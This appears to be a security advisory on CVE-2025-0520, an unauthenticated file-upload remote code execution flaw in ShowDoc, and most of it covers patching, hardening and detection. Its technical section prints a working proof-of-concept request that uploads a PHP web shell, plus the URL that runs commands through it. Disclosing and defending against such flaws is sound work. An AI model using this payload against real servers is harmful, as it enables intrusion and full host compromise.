CVE-2025-0520 – Critical Unauthenticated File‑Upload RCE in ShowDoc
Key takeaways
- Critical remote‑code‑execution via unauthenticated file upload.
- Affects ShowDoc versions < 2.8.7 (pre‑Oct 2020).
- Over 2,000 public instances observed, mainly in China; active exploitation reported mid‑April 2026.
- Patch to ≥ 2.8.7 (current 3.8.1) immediately; no viable work‑around.
- Monitor for web‑shell uploads and block suspicious file types.
Overview
The vulnerability is a Critical unauthenticated file‑upload bug in ShowDoc, a popular Chinese open‑source documentation platform. Tracked as CVE-2025-0520, it allows attackers to upload arbitrary PHP files and achieve remote code execution. The CVSS base score is CVSS 9.4. Active exploitation has been observed on 2026‑04‑11, 2026‑04‑14, and 2026‑04‑15, with 47 mentions across three days and more than 2,000 exposed instances, primarily in China. The fix has been available since October 2020 (ShowDoc 2.8.7). Track live threat activity at https://vulnsocial.com/cve/CVE-2025-0520.
Technical Details
The flaw stems from insufficient validation of uploaded file extensions and MIME types in the upload handler. An attacker can send a multipart/form‑data POST request to the upload endpoint (e.g., /index.php?c=upload&a=save) with a file named shell.php. The server stores the file in a web‑accessible directory (/uploads/), making it executable via a direct HTTP request. No authentication is required, so any remote attacker can gain full server control.
POST /index.php?c=upload&a=save HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/php
<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--
After a successful upload, the attacker can execute http://target.example.com/uploads/shell.php?cmd=id to run arbitrary commands on the host.
Severity & Impact
| CVE ID | CVSS | Severity | Fixed in |
|---|---|---|---|
| CVE-2025-0520 | 9.4 | Critical | ShowDoc 2.8.7 |
The vulnerability provides unauthenticated remote code execution, granting an attacker full control over the host, the ability to exfiltrate data, install additional malware, and pivot to internal networks.
Affected Products
The flaw affects ShowDoc installations prior to version 2.8.7. The current stable release is 3.8.1. For a complete list of affected versions and vendor details, see the CVE page.
Actionable Insights
- Inventory: Identify all ShowDoc instances in your environment. Use internal asset inventories and external scanning to locate public instances.
- Patch: Update ShowDoc to version 2.8.7 or later (preferably 3.8.1). Verify the version via the
/api/versionendpoint or theversion.phpfile. - Hardening: Disable or restrict file uploads where not required. Enforce a whitelist of allowed extensions (e.g.,
.jpg,.png,.pdf) and validate MIME types. - WAF/IPS: Deploy a web‑application firewall rule to block uploads of files with
.php,.phtml,.php5, etc., and to inspect multipart/form‑data payloads for suspicious content. - Detection: Monitor web server logs for POST requests to upload endpoints and for newly created PHP files in upload directories. Alert on any occurrence of
shell.phpor similar filenames. - Containment: If a vulnerable instance is found, isolate it from the network, remove any uploaded web shells, and perform a thorough incident response.
- Threat Intel: Subscribe to vulnerability feeds (e.g., VulnSocial) to receive real‑time alerts on exploitation attempts for CVE-2025-0520.
Remediation & Mitigation
- Patch: Upgrade ShowDoc to the latest stable release (≥ 3.8.1). The fix was introduced in 2.8.7.
- Configuration: Disable file uploads where not needed or restrict the upload directory's execution permissions (e.g.,
chmod 730). - WAF Rule: Block uploads of files with PHP extensions and enforce strict MIME type checks.
- File Integrity Monitoring: Scan the upload directory for newly added
.phpfiles on a regular basis. - Log Monitoring: Set up alerts for anomalous POST requests to
/index.php?c=upload&a=saveand for execution of unexpected scripts. - Incident Response: If a web shell is detected, remove it, rotate credentials, and conduct a full compromise assessment.
Bottom line
CVE-2025-0520 is a Critical remote‑code‑execution bug in ShowDoc (CVSS 9.4) that is actively exploited in the wild. With a patch available for over six years, any unpatched deployment is a high‑value target. Immediate patch, hardening, and monitoring are required.
References
#CVE #CVE20250520 #ShowDoc #RCE #Critical #ActiveExploitation #VulnCheck
